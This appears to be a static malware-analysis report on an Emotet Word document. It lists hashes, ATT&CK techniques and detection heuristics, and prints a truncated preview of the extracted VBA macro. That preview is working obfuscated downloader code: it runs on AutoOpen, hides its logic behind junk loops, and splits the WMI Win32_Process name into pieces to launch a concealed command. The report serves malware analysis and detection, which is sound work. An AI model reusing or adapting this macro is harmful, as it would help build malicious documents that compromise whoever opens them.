Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 79a041b550ffa918…

MALICIOUS

Office (OLE)

Size: 142.6 KB
Created: 2019-05-07 06:40:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 7396542149e1802ad9ba98ce733b1a37
SHA-1: f2a443e2c93642ac2305f0c452b6b8c3c752b8b1
SHA-256: 79a041b550ffa918f27405f205525df208b7e220fe37c7e1993fe297405b5b05
Risk score: 302

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains a VBA macro with an AutoOpen entry point, a technique commonly used by Emotet. The macro uses GetObject and CreateObject to obtain a WMI object through the 'winmgmts' moniker and launch a process with it (Win32_Process creation). This indicates that the macro's purpose is to download and execute a second-stage payload.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6964070-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6964070-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE)
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call (high, OLE_VBA_GETOBJ)
    GetObject call
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                  | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)     | 4923 bytes
SHA-256: 07d013dc8e3a355d9fe2cb46ffccf3608fbcbc4fe0c40ad5831a49038ff75185
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "s76753"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "i659_4"
Attribute VB_Base = "0{055885CB-4D23-42A8-9E8E-94D203285A59}{EEE211E3-0AA4-48A5-83A0-BAF936A399F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "H48_782"

Attribute VB_Name = "G385441"

Attribute VB_Name = "C_757645"

Attribute VB_Name = "Z347027"

Attribute VB_Name = "i53486"

Attribute VB_Name = "t2550951"
Attribute VB_Base = "0{012F8316-9F9C-49C0-B0F4-F7B644B4DE4F}{7AC199C1-C367-4731-904F-20D826AB32FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "O53012"
Function J42_489(F58898)
         While v6924051 And w1___490
'H857588s359__A0033180n_863_36
      Wend
         While i7459943 And T1984215
'D50657l58028Z36542s3625924
      Wend
Set J42_489 = CVar(F58898)
         While i292831 And V02095
'h8798_S93423_r94792W_03804
      Wend
         While C9291856 And H_269176
'O034989A0442576z82092k618_51
      Wend
End Function
Sub _
autoopen()
On Error Resume Next
         While c_8955 And F3026439
'J79106q896224i535311w067_0
      Wend
         While h282879 And n507_2
'V084148z3657578N_82471B5_7536
      Wend
         While Y86_477_ And G094_30
'N8_77680n74901__G_91078_f55021
      Wend
Call X61664
         While Y9884740 And E981060
'p45073K065687E33847z03238
      Wend
         While M469_0_ And I0_2931
'I9360213r376_4_4P234570p3___0
      Wend
         While D7684_ And Y_822219
'v3910444o66562o4921914W04257
      Wend
End Sub


Attribute VB_Name = "C93518"
Function X61664()
On Error Resume Next
         While v366838 And D88_42
'R7142248o7307_2o_2419N_00558
      Wend
         While v7662263 And Z299088
'Q99752_7z396425_w538453K190_33
      Wend
         While f438055 And o29819
'h6157567l637744J05981J46259
      Wend
P115854 = i659_4.P4905_5 + t2550951.z__130 + i659_4.P4905_5.ControlSource + t2550951.K_0_21 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5 + t2550951.M35945 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5.PasswordChar + t2550951.j018245 + i659_4.P4905_5 + t2550951.Z1189_4 + i659_4.P4905_5.ControlTipText
         While D4855741 And V8_0657
'v4559575n05_89t230_91q5396_
      Wend
         While i1_1669_ And b077_014
'w52510__V5539851D40368V8467193
      Wend
         While H2532_ And b078712
'I624411O00354W3621689P982703
      Wend
Set T452521 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess"))
         While q5019527 And c0281_
'j62_649z09419J63872s383411
      Wend
         While q23189 And X832816
'd68362L2429176W56_712i84074
      Wend
         While J773572 And X119_84
'H3536876i_7_965G842717N62115
      Wend
T452521.Create d09064 + P115854 + L97_717, U_015368, u10471, a80964
         While i92_82 And c34_4505
'N364797O081866_T128_1j229202
      Wend
         While w27916 And u4_985
'U83759j898004_V50244_1a836_09
      Wend
End Function

Attribute VB_Name = "O3541311"

Public Function u10471()
         While Z59524 And R2290302
'z_59_0w031543Z8307707o8309_
      Wend
         While G7463_72 And q341043
'j887856K570484G88707V266717
      Wend
         While O726542 And S12124_2
'B3424992o63624l8431503P09025
      Wend
Set u10471 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess" + "S" + "tartup"))
         While D1383169 And X19165
'c522639S67699O1591705R03_991
      Wend
         While G757379 And C01456
'E23862u3736_v92703v1021064
      Wend
c052037 = vbError - vbError
         While
... (truncated)